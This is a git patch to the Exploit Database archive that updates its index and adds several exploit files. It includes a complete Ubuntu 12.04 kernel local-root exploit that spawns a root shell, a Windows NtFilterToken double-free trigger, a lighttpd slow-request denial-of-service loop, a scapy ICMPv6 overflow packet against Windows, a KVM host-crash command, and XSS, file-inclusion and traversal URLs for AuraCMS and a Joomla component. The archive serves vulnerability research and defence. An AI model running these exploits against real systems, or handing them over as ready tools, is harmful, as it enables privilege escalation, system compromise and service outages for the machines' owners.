From 46fb11d33b725fc40597c81ce09507091be2eb50 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 2 Jun 2014 04:37:23 +0000 Subject: [PATCH] Updated 06_02_2014 --- files.csv | 15 +++- platforms/linux/dos/33591.sh | 15 ++++ platforms/linux/dos/33592.txt | 12 +++ platforms/linux/local/33589.c | 133 ++++++++++++++++++++++++++++ platforms/php/webapps/33555.txt | 86 ++++++++++++++++++ platforms/php/webapps/33590.txt | 9 ++ platforms/windows/local/33593.c | 135 +++++++++++++++++++++++++++++ platforms/windows/remote/33594.txt | 17 ++++ 8 files changed, 418 insertions(+), 4 deletions(-) create mode 100755 platforms/linux/dos/33591.sh create mode 100755 platforms/linux/dos/33592.txt create mode 100755 platforms/linux/local/33589.c create mode 100755 platforms/php/webapps/33555.txt create mode 100755 platforms/php/webapps/33590.txt create mode 100755 platforms/windows/local/33593.c create mode 100755 platforms/windows/remote/33594.txt diff --git a/files.csv b/files.csv index b52b011bc..169888951 100755 --- a/files.csv +++ b/files.csv @@ -13388,7 +13388,7 @@ id,file,description,date,author,platform,type,port 15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0 15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0 15449,platforms/linux/remote/15449.pl,"ProFTPD IAC Remote Root Exploit",2010-11-07,kingcope,linux,remote,0 -15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel h0wl Wylecial",windows,remote,21 +15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21 15451,platforms/php/webapps/15451.pl,"DeluxeBB <= 1.3 Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0 15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability",2010-11-07,SYSTEM_OVERIDE,php,webapps,0 15453,platforms/php/webapps/15453.txt,"Joomla Component (com_ckforms) Local File Inclusion Vulnerability",2010-11-08,"ALTBTA ",php,webapps,0 @@ -17181,7 +17181,7 @@ id,file,description,date,author,platform,type,port 19857,platforms/windows/remote/19857.rb,"ALLMediaServer 0.8 - Buffer Overflow",2012-07-16,metasploit,windows,remote,888 19859,platforms/hardware/webapps/19859.txt,"Vivotek Cameras Sensitive Information Disclosure",2012-07-16,GothicX,hardware,webapps,0 19862,platforms/php/webapps/19862.pl,"Wordpress Diary/Notebook Site5 Theme Email Spoofing",2012-07-16,bwall,php,webapps,0 -19863,platforms/php/webapps/19863.txt,"CakePHP 2.x-2.2.0-RC2 XXE Injection",2012-07-16,"Pawel h0wl Wylecial",php,webapps,0 +19863,platforms/php/webapps/19863.txt,"CakePHP 2.x-2.2.0-RC2 XXE Injection",2012-07-16,"Pawel Wylecial",php,webapps,0 19864,platforms/php/webapps/19864.txt,"VamCart 0.9 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 19865,platforms/php/webapps/19865.txt,"PBBoard 2.1.4 - CMS Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 19866,platforms/windows/dos/19866.pl,"DomsHttpd <= 1.0 - Remote Denial of Service Exploit",2012-07-16,"Jean Pascal Pereira",windows,dos,0 @@ -23212,7 +23212,7 @@ id,file,description,date,author,platform,type,port 26128,platforms/osx/dos/26128.html,"Apple Safari 1.3 Web Browser JavaScript Invalid Address Denial of Service Vulnerability",2005-08-09,"Patrick Webster",osx,dos,0 26129,platforms/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - CSRF Vulnerability",2013-06-11,"Prayas Kulshrestha",hardware,webapps,0 26130,platforms/windows/dos/26130.py,"WinRadius 2.11 - Denial of Service",2013-06-11,npn,windows,dos,0 -26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 - x86_64 perf_swevent_init Local root Exploit",2013-06-11,"Andrea Bittau",linux,local,0 +26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 - x86_64 perf_swevent_init Local Root Exploit",2013-06-11,"Andrea Bittau",linux,local,0 26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection Vulnerability",2013-06-11,"CWH Underground",php,webapps,0 26133,platforms/windows/dos/26133.py,"Sami FTP Server 2.0.1 - RETR Denial of Service",2013-06-11,Chako,windows,dos,21 26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow",2013-06-11,metasploit,windows,remote,0 @@ -30227,6 +30227,7 @@ id,file,description,date,author,platform,type,port 33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 URI Validation Remote Code Execution Vulnerability",2010-01-21,"Lostmon Lords",windows,remote,0 33553,platforms/multiple/remote/33553.txt,"Sun Java System Web Server 6.1/7.0 Digest Authentication Remote Buffer Overflow Vulnerability",2010-01-21,Intevydis,multiple,remote,0 33554,platforms/linux/remote/33554.py,"TORQUE Resource Manager 2.5.x-2.5.13 - Stack Based Buffer Overflow Stub",2014-05-28,bwall,linux,remote,0 +33555,platforms/php/webapps/33555.txt,"AuraCMS 3.0 - Multiple Vulnerabilities",2014-05-28,"Mustafa ALTINKAYNAK",php,webapps,0 33556,platforms/multiple/dos/33556.rb,"Wireshark CAPWAP Dissector - Denial of Service (msf)",2014-05-28,j0sm1,multiple,dos,5247 33557,platforms/php/webapps/33557.txt,"Sharetronix 3.3 - Multiple Vulnerabilities",2014-05-28,"High-Tech Bridge SA",php,webapps,80 33558,platforms/php/webapps/33558.txt,"cPanel and WHM 11.25 'failurl' Parameter HTTP Response Splitting Vulnerability",2010-01-21,Trancer,php,webapps,0 @@ -30257,5 +30258,11 @@ id,file,description,date,author,platform,type,port 33584,platforms/multiple/dos/33584.txt,"IBM DB2 'kuddb2' Remote Denial of Service Vulnerability",2010-01-31,"Evgeny Legerov",multiple,dos,0 33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x 64bit Personality Handling Local Denial of Service Vulnerability",2010-02-01,"Mathias Krause",linux,dos,0 33586,platforms/php/webapps/33586.txt,"Joomla! 'com_gambling' Component 'gamblingEvent' Parameter SQL Injection Vulnerability",2010-02-01,md.r00t,php,webapps,0 -33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel h0wl Wylecial",windows,dos,0 +33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",windows,dos,0 33588,platforms/java/remote/33588.rb,"ElasticSearch Dynamic Script Arbitrary Java Execution",2014-05-30,metasploit,java,remote,9200 +33589,platforms/linux/local/33589.c,"Ubuntu 12.04.0-2LTS x64 perf_swevent_init - Kernel Local Root Exploit",2014-05-31,"Vitaly Nikolenko",linux,local,0 +33590,platforms/php/webapps/33590.txt,"Joomla! AutartiTarot Component Directory Traversal Vulnerability",2010-02-01,B-HUNT3|2,php,webapps,0 +33591,platforms/linux/dos/33591.sh,"lighttpd 1.4/1.5 Slow Request Handling Remote Denial Of Service Vulnerability",2010-02-02,"Li Ming",linux,dos,0 +33592,platforms/linux/dos/33592.txt,"Linux Kernel 2.6.x KVM 'pit_ioport_read()' Local Denial of Service Vulnerability",2010-02-02,"Marcelo Tosatti",linux,dos,0 +33593,platforms/windows/local/33593.c,"Microsoft Windows XP/VISTA/2000/2003 Double Free Memory Corruption Local Privilege Escalation Vulnerability",2010-02-09,"Tavis Ormandy",windows,local,0 +33594,platforms/windows/remote/33594.txt,"Microsoft Windows VISTA/2008 ICMPv6 Router Advertisement Remote Code Execution Vulnerability",2010-02-09,"Sumit Gwalani",windows,remote,0 diff --git a/platforms/linux/dos/33591.sh b/platforms/linux/dos/33591.sh new file mode 100755 index 000000000..bc9247140 --- /dev/null +++ b/platforms/linux/dos/33591.sh @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/38036/info + +The 'lighttpd' webserver is prone to a denial-of-service vulnerability. + +Remote attackers can exploit this issue to cause the application to hang, denying service to legitimate users. + +##slow_test.sh +for ((j=0;j<1000;j++)) do + for ((i=0; i<50; i++)) do + ## slow_client is a C program which sends a HTTP request very slowly + ./slow_client http://www.example.com/>/dev/null 2>/dev/null & + done& + sleep 3 +done + diff --git a/platforms/linux/dos/33592.txt b/platforms/linux/dos/33592.txt new file mode 100755 index 000000000..b2274f5e5 --- /dev/null +++ b/platforms/linux/dos/33592.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/38038/info + + +The Linux kernel is prone to a local denial-of-service vulnerability that affects the Kernel-based Virtual Machine (KVM). + +Attackers with local access to a guest operating system can exploit this issue to crash the host operating system. + +Successful exploits will deny service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed. + +The following example command is available: + +cat /dev/port \ No newline at end of file diff --git a/platforms/linux/local/33589.c b/platforms/linux/local/33589.c new file mode 100755 index 000000000..0d972437a --- /dev/null +++ b/platforms/linux/local/33589.c @@ -0,0 +1,133 @@ +/** + * Ubuntu 12.04 3.x x86_64 perf_swevent_init Local root exploit + * by Vitaly Nikolenko (vnik5287@gmail.com) + * + * based on semtex.c by sd + * + * Supported targets: + * [0] Ubuntu 12.04.0 - 3.2.0-23-generic + * [1] Ubuntu 12.04.1 - 3.2.0-29-generic + * [2] Ubuntu 12.04.2 - 3.5.0-23-generic + * + * $ gcc vnik.c -O2 -o vnik + * + * $ uname -r + * 3.2.0-23-generic + * + * $ ./vnik 0 + */ + +#define _GNU_SOURCE 1 +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define BASE 0x1780000000 +#define SIZE 0x0010000000 +#define KSIZE 0x2000000 +#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337)))) + +typedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred); +typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred); + +uint64_t targets[3][3] = + {{0xffffffff81ef67e0, // perf_swevent_enabled + 0xffffffff81091630, // commit_creds + 0xffffffff810918e0}, // prepare_kernel_cred + {0xffffffff81ef67a0, + 0xffffffff81091220, + 0xffffffff810914d0}, + {0xffffffff81ef5940, + 0xffffffff8107ee30, + 0xffffffff8107f0c0} + }; + +void __attribute__((regparm(3))) payload() { + uint32_t *fixptr = (void*)AB(1); + // restore the handler + *fixptr = -1; + commit_creds_fn commit_creds = (commit_creds_fn)AB(2); + prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)AB(3); + commit_creds(prepare_kernel_cred((uint64_t)NULL)); +} + +void trigger(uint32_t off) { + uint64_t buf[10] = { 0x4800000001, off, 0, 0, 0, 0x300 }; + int fd = syscall(298, buf, 0, -1, -1, 0); + assert( !close(fd) ); +} + +int main(int argc, char **argv) { + uint64_t off64, needle, kbase, *p; + uint8_t *code; + uint32_t int_n, j = 5, target = 1337; + int offset = 0; + void *map; + + assert(argc == 2 && "target?"); + assert( (target = atoi(argv[1])) < 3 ); + + struct { + uint16_t limit; + uint64_t addr; + } __attribute__((packed)) idt; + + // mmap user-space block so we don't page fault + // on sw_perf_event_destroy + assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE); + memset(map, 0, SIZE); + + asm volatile("sidt %0" : "=m" (idt)); + kbase = idt.addr & 0xff000000; + printf("IDT addr = 0x%lx\n", idt.addr); + + assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase); + memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &payload, 1024); + memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 13); + + // can only play with interrupts 3, 4 and 0x80 + for (int_n = 3; int_n <= 0x80; int_n++) { + for (off64 = 0x00000000ffffffff; (int)off64 < 0; off64--) { + int off32 = off64; + + if ((targets[target][0] + ((uint64_t)off32)*24) == (idt.addr + int_n*16 + 8)) { + offset = off32; + goto out; + } + } + if (int_n == 4) { + // shit, let's try 0x80 if the kernel is compiled with + // CONFIG_IA32_EMULATION + int_n = 0x80 - 1; + } + } +out: + assert(offset); + printf("Using int = %d with offset = %d\n", int_n, offset); + + for (j = 0; j < 3; j++) { + needle = AB(j+1); + assert(p = memmem(code, 1024, &needle, 8)); + *p = !j ? (idt.addr + int_n * 16 + 8) : targets[target][j]; + } + trigger(offset); + switch (int_n) { + case 3: + asm volatile("int $0x03"); + break; + case 4: + asm volatile("int $0x04"); + break; + case 0x80: + asm volatile("int $0x80"); + } + + assert(!setuid(0)); + return execl("/bin/bash", "-sh", NULL); +} diff --git a/platforms/php/webapps/33555.txt b/platforms/php/webapps/33555.txt new file mode 100755 index 000000000..6e26f06c2 --- /dev/null +++ b/platforms/php/webapps/33555.txt @@ -0,0 +1,86 @@ +# Exploit Title: AuraCMS 3.0 Multiple Vulnerabilities +# Date: 05/28/2014 +# Author: Mustafa ALTINKAYNAK +# Download URL :http://auracms.org/ +# Software Link: http://codeload.github.com/auracms/AuraCMS/zip/master +# Vuln Category: CWE-79 (XSS) - CWE-98 (LFI) +# Tested on: AuraCMS 3.0 +# Tested Local Platform : XAMP on Windows 8 +# Patch/ Fix: Not published. +--------------------------- + +Technical Details +--------------------------- +1) Reflected XSS : FileManager is a parameter unfiltered view of the file. +Ex: filemanager.php?viewdir="> + +2) LFI (Local File Include) : Directory listing is done. +Ex : filemanager.php?viewdir=/home + +--------------------------------------------------------------------------------- +# filemanager.php (Between 263,311 line) +Example : domain.com/auracms/filemanager.php?viewdir=request +280 line : + +Example 2 : domain.com/auracms/filemanager.php?viewdir="> +" name="return" /> + +Example 3 : domain.com/auracms/filemanager.php?viewdir= +" name="return" /> Bingooo :) + + +
    +
  • +
  • +
  • +
  • +
+ +
+ +
+ + + +----------- + +Mustafa ALTINKAYNAK +twitter : @m_altinkaynak +www.mustafaaltinkaynak.com diff --git a/platforms/php/webapps/33590.txt b/platforms/php/webapps/33590.txt new file mode 100755 index 000000000..580804856 --- /dev/null +++ b/platforms/php/webapps/33590.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/38034/info + +The AutartiTarot component for Joomla! is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. + +Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. + +NOTE: Successful exploitation requires having 'Public Back-end' group credentials. + +http://www.example.com/administrator/index.php?option=com_autartitarot&task=edit&cid[]=38&controller=[DT] \ No newline at end of file diff --git a/platforms/windows/local/33593.c b/platforms/windows/local/33593.c new file mode 100755 index 000000000..7325e09f0 --- /dev/null +++ b/platforms/windows/local/33593.c @@ -0,0 +1,135 @@ +source: http://www.securityfocus.com/bid/38044/info + +Microsoft Windows is prone to a local privilege-escalation vulnerability that occurs in the kernel. + +An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will cause a denial of service. + +// -------------------------------------------------------- +// Windows NtFilterToken() Double Free Vulnerability +// ----------------------------- taviso@sdf.lonestar.org ------------ +// +// INTRODUCTION +// +// NtFilterToken() will jump to a cleanup routine if it failed to capture +// the arguments specified due to pathological TOKEN_GROUP parameter. This +// cleanup routine assumes a pointer passed to SeCaptureSidAndAttributesArray() +// will be NULL if it fails, and attempts to release it otherwise. +// +// Unfortunately there is a codepath where SeCaptureSidAndAttributesArray() +// allocates a buffer, releases it on error, but then does not set it to +// NULL. This causes NtFilterToken() to incorrectly free it again. +// +// IMPACT +// +// This is probably exploitable (at least on MP kernels) to get ring0 code +// execution, but you would have to get the released buffer re-allocated +// during a very small window and you only get one attempt (the kernel +// will bugcheck if you dont win the race). +// +// Although technically this is a local privilege escalation, I don't think +// it's possible to create a reliable exploit. Therefore, It's probably +// safe to treat this as if it were a denial of service. +// +// Interestingly, Microsoft are big proponents of static analysis and this +// seems like a model example of a statically discoverable bug. I would +// guess they're dissapointed they missed this one, it would be fun to +// know what went wrong. +// +// This vulnerability was reported to Microsoft in October, 2009. +// +// CREDIT +// +// This bug was discovered by Tavis Ormandy . +// + +#include + +PVOID AllocBufferOnPageBoundary(ULONG Size); + +int main(int argc, char **argv) +{ + SID *Sid; + HANDLE NewToken; + FARPROC NtFilterToken; + PTOKEN_GROUPS Restricted; + + // Resolve the required routine. + NtFilterToken = GetProcAddress(GetModuleHandle("NTDLL"), "NtFilterToken"); + + // Allocate SID such that touching the following byte will AV. + Sid = AllocBufferOnPageBoundary(sizeof(SID)); + Restricted = AllocBufferOnPageBoundary(sizeof(PTOKEN_GROUPS) + sizeof(SID_AND_ATTRIBUTES)); + + // Setup SID, SubAuthorityCount is the important field. + Sid->Revision = SID_REVISION; + Sid->SubAuthority[0] = SECURITY_NULL_RID; + Sid->SubAuthorityCount = 2; + + // Respect my authority. + CopyMemory(Sid->IdentifierAuthority.Value, "taviso", sizeof Sid->IdentifierAuthority.Value); + + // Setup the TOKEN_GROUPS structure. + Restricted->Groups[0].Attributes = SE_GROUP_MANDATORY; + Restricted->Groups[0].Sid = Sid; + Restricted->GroupCount = 1; + + // Trigger the vulnerabilty. + NtFilterToken(INVALID_HANDLE_VALUE, + 0, + NULL, + NULL, + Restricted, + &NewToken); + + // Not reached + return 0; +} + +#ifndef PAGE_SIZE +# define PAGE_SIZE 0x1000 +#endif + +// This is a quick routine to allocate a buffer on a page boundary. Simply +// VirtualAlloc() two consecutive pages read/write, then use VirtualProtect() +// to set the second page to PAGE_NOACCESS. +// +// sizeof(buffer) +// | +// <-+-> +// +----------------+----------------+ +// | PAGE_READWRITE | PAGE_NOACCESS | +// +----------------+----------------+ +// ^ ^ +// | | +// buffer[0] -+ +- buffer[size] +// +// No error checking for simplicity, whatever :-) +// +PVOID AllocBufferOnPageBoundary(ULONG Size) +{ + ULONG GuardBufSize; + ULONG ProtBits; + PBYTE GuardBuf; + + // Round size requested up to the next multiple of PAGE_SIZE + GuardBufSize = (Size + (PAGE_SIZE - 1)) & ~(PAGE_SIZE - 1); + + // Add one page to be the guard page + GuardBufSize = GuardBufSize + PAGE_SIZE; + + // Map this anonymous memory + GuardBuf = VirtualAlloc(NULL, + GuardBufSize, + MEM_COMMIT | MEM_RESERVE, + PAGE_READWRITE); + + // Make the final page NOACCESS + VirtualProtect(GuardBuf + GuardBufSize - PAGE_SIZE, + PAGE_SIZE, + PAGE_NOACCESS, + &ProtBits); + + // Calculate where pointer should be, so that touching Buffer[Size] AVs. + return GuardBuf + GuardBufSize - PAGE_SIZE - Size; +} + diff --git a/platforms/windows/remote/33594.txt b/platforms/windows/remote/33594.txt new file mode 100755 index 000000000..89697a793 --- /dev/null +++ b/platforms/windows/remote/33594.txt @@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/38061/info + +Microsoft Windows TCP/IP protocol implementation is prone to a remote code-execution vulnerability. + +An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will completely compromise affected computers. Failed exploit attempts will likely result in denial-of-service conditions. + + +v6_dst = "" + +mac_dst = "" + +pkt = IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA() / ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix="2001::") / Raw(load='A'*2008) + +l=fragment6(pkt, 1500) + +for p in l: +sendp(Ether(dst=mac_dst)/p, iface="eth0") \ No newline at end of file